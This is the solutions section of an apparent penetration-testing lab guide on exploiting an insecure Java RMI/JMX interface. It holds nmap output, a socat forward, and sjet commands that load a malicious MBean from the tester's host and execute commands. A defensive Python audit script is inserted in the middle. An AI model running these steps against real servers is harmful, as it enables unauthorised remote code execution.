© 2020 Caendra Inc. | HERA for WAPTXv2 | Insecure RMI


GETTING STARTED

You are placed in an unknown network. Using nmap, discover a Remote Method Invocation (RMI) interface
and achieve code execution by taking advantage of a misconfiguration.

Goals:

• Find and identify a vulnerable interface
• Write a custom tool or modify a publicly available one to achieve code execution

What you will learn:

• Attacking insecure RMI interfaces
• Customizing a tool in order to successfully attack RMI implementations

Recommended tools:

• Burp Suite
• RMI exploitation tool, e.g. sjet (https://github.com/siberas/sjet)
• Socat
• Nmap
• Netcat

The vulnerable machine can be found at 172.16.64.205

Task 1. Find all RMI ports on the target machine.

Task 2. Tweak the exploitation tool a bit, so that it is able to talk to the vulnerable interface. Focus on any
hardcoded names that need to be changed.

Task 3. Use port forwarding so that the RMI interface can properly communicate with its second part.

Task 4. Run the exploit in order to obtain code execution.

SOLUTIONS

Below, you can find solutions for each task. Remember, though, that you can follow your own strategy,
which may differ from the one explained in the following lab.

SOLUTIONS – TASK #1

A basic nmap scan with the -A option (or with the “rmi-dumpregistry” script) can be used to list the
whole interface.

Nmap scan report for 172.16.64.205


Host is up (0.14s latency).
Not shown: 65345 closed ports, 186 filtered ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 76:f6:ef:c1:3f:45:1a:a8:8a:91:50:34:02:0b:5b:0b (RSA)
| 256 46:c3:cc:07:8f:b4:d6:68:5f:07:c6:6c:e2:06:16:45 (ECDSA)
|_ 256 5b:50:f1:f7:be:f9:fa:96:30:63:40:73:ac:59:69:8c (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
9999/tcp open java-rmi Java RMI
| rmi-dumpregistry:
| CustomJMXRMI
| javax.management.remote.rmi.RMIServerImpl_Stub
| @127.0.1.1:40767
| extends
| java.rmi.server.RemoteStub
| extends
|_ java.rmi.server.RemoteObject
40767/tcp open java-rmi Java RMI

We notice a custom registry name (CustomJMXRMI instead of the default jmxrmi) and a stub bound to a
loopback address (127.0.1.1). Both are likely to cause problems when trying to exploit the interface
with an automated tool that expects the defaults.
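As an added, defender-oriented example that is not part of the lab: a small Python audit script that parses nmap's rmi-dumpregistry output (the SCAN text is the excerpt from the report above with nmap's tree indentation restored) and reports the three conditions this lab hinges on: a JMX connector (RMIServerImpl_Stub) bound in the registry, a non-default registry name, and a stub that advertises a loopback endpoint. The parser and the finding texts are my own; it also accepts a full report, skipping non-RMI port sections.

```python
import re
from ipaddress import ip_address

# Registry excerpt copied from the scan output above (nmap's tree indentation restored).
SCAN = """\
9999/tcp open java-rmi Java RMI
| rmi-dumpregistry:
|   CustomJMXRMI
|     javax.management.remote.rmi.RMIServerImpl_Stub
|     @127.0.1.1:40767
|     extends
|       java.rmi.server.RemoteStub
|       extends
|_        java.rmi.server.RemoteObject
40767/tcp open java-rmi Java RMI
"""

def parse_dumpregistry(text):
    # One dict per bound name; walks the tree line by line, so lost indentation does not matter.
    bindings, reg_port, state, prev = [], 0, None, ""
    for raw in text.splitlines():
        m = re.match(r"(\d+)/tcp\s+open\s+(\S+)", raw)
        if m:                                    # port line: only java-rmi sections are parsed
            reg_port, state = int(m.group(1)), ("name" if m.group(2) == "java-rmi" else None)
        line = raw.lstrip("|_").strip() if raw.startswith("|") else ""
        if not state or not line or line.endswith(":"):
            continue                             # non-RMI section, port line or script header
        if state == "class":                     # line after a bound name is its stub class
            bindings[-1]["stub"], state = line, "detail"
        elif line.startswith("@"):               # endpoint the stub dials, host:port
            host, _, port = line[1:].rpartition(":")
            bindings[-1].update(host=host, port=int(port))
        elif state == "detail" and "extends" in (line, prev):
            pass                                 # inheritance chain of the stub class
        else:                                    # anything else starts the next bound name
            bindings.append({"registry": reg_port, "name": line, "stub": "", "host": "", "port": 0})
            state = "class"
        prev = line
    return bindings

def assess(b):
    # Defender-side checks on one binding; returns the findings as strings.
    f = []
    if b["stub"].endswith("RMIServerImpl_Stub"):
        f.append("JMX connector bound in the registry: MBeans are reachable if authentication is off")
        if b["name"] != "jmxrmi":
            f.append(f"non-default name {b['name']!r} is obscurity, not access control")
    if b["host"] and ip_address(b["host"]).is_loopback:
        f.append(f"stub advertises loopback {b['host']}:{b['port']}: java.rmi.server.hostname is unset, yet the exported object still listens on the host's port {b['port']}")
    return f
```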

SOLUTIONS – TASK #2

We downloaded the tool https://github.com/siberas/sjet with “git clone”, as well as a Jython
standalone jar from http://search.maven.org/remotecontent?filepath=org/python/jython-standalone/2.7.0/jython-standalone-2.7.0.jar

If we try to run the tool as described in its GitHub README, we encounter an error.

The reason is that the tool uses the default jmxrmi name in its JMXServiceURL, while the registry
exposes the connector under a custom name.

To match it, we need to modify the program itself (sjet.py): at the beginning of the file, change the
registry name in the JMXServiceURL from jmxrmi to CustomJMXRMI, as follows.


However, the connection still cannot be established.

SOLUTIONS – TASK #3

If you run Wireshark on the loopback interface (or on all interfaces), you will observe that during the
exploit’s execution your machine tries to connect to the RMI stub at the address the registry dump
advertises, 127.0.1.1, i.e. on your own loopback.

The stub is of course not running on your machine. Since port 40767 is open on the target, redirect
traffic from localhost:40767 to the remote host. This can be achieved using socat.

socat tcp-l:40767,fork tcp:172.16.64.205:40767

SOLUTIONS – TASK #4

Now, with socat set up, you can run the patched tool twice in order to achieve code execution. First,
install the MBean with the command below.

jython sjet.py 172.16.64.205 9999 password install http://172.16.64.3:7000

The MBean will be protected with the password “password”.

Now, to execute code using the installed MBean, use the command below.

jython sjet.py 172.16.64.205 9999 password command "id"

The machine is compromised! Don’t forget to uninstall the malicious MBean, as follows.
